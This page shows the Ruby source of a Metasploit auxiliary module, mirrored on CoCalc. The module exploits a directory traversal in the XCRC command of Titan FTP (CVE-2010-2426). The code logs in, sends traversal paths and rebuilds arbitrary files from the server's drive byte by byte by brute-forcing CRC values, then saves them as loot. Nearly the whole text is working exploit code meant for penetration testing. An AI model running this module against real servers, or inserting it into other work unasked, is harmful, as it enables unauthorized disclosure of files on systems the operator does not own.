CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Ftp7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner910def proto11'ftp'12end1314def initialize15super(16'Name' => 'Titan FTP XCRC Directory Traversal Information Disclosure',17'Description' => %q{18This module exploits a directory traversal vulnerability in the XCRC command19implemented in versions of Titan FTP up to and including 8.10.1125. By making20sending multiple XCRC command, it is possible to disclose the contents of any21file on the drive with a simple CRC "brute force" attack.2223Although the daemon runs with SYSTEM privileges, access is limited to files24that reside on the same drive as the FTP server's root directory.25},26'Author' =>27[28'jduck',29'Brandon McCann @zeknox <bmccann[at]accuvant.com>',30],31'License' => MSF_LICENSE,32'References' =>33[34[ 'CVE', '2010-2426' ],35[ 'OSVDB', '65533'],36[ 'URL', 'https://seclists.org/bugtraq/2010/Jun/160' ]37],38'DisclosureDate' => 'Jun 15 2010'39)4041register_options(42[43Opt::RPORT(21),44OptString.new('TRAVERSAL', [ true, "String to traverse to the drive's root directory", "..\\..\\" ]),45OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'windows\\win.ini'])46])47end484950def run_host(ip)5152c = connect_login53return if not c5455path = datastore['TRAVERSAL'] + datastore['PATH']5657res = send_cmd( ['XCRC', path, "0", "9999999999"], true )58if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./)59print_error("Unable to obtain file size! File probably doesn't exist.")60return61end62file_size = $1.to_i6364update_interval = 1.565last_update = Time.now - update_interval6667old_crc = 068file_data = ''69file_size.times { |off|70res = send_cmd( ['XCRC', path, "0", (off+1).to_s], true )71if not (res =~ /250 (.*)\r?\n/)72raise RuntimeError, "Unable to obtain XCRC of byte #{off}!"73end7475crc = $1.to_i(16)76if (crc == 0)77raise RuntimeError, "Unable to decode CRC: #{$1}"78end7980ch = char_from_crc(crc, old_crc)81if not (ch)82raise RuntimeError, ("Unable to find a CRC match for 0x%x" % crc)83end8485# got this byte ;)86file_data << ch87old_crc = crc8889if (Time.now - last_update) >= update_interval90progress(file_size, off)91last_update = Time.now92end93}9495progress(file_size, file_size)9697fname = datastore['PATH'].gsub(/[\/\\]/, '_')98p = store_loot("titanftp.traversal", "text/plain", ip, file_data, fname)99print_good("Saved in: #{p}")100vprint_status(file_data.inspect)101102disconnect103104end105106#107# Return a character code from the crc, or nil on failure108#109def char_from_crc(crc, old_crc)110256.times { |x|111ch = x.chr112if (Zlib.crc32(ch, old_crc) == crc)113return ch114end115}116nil117end118119def progress(total, current)120done = (current.to_f / total.to_f) * 100121percent = "%3.2f%%" % done.to_f122print_status("Obtaining file contents - %7s done (%d/%d bytes)" % [percent, current, total])123end124end125126127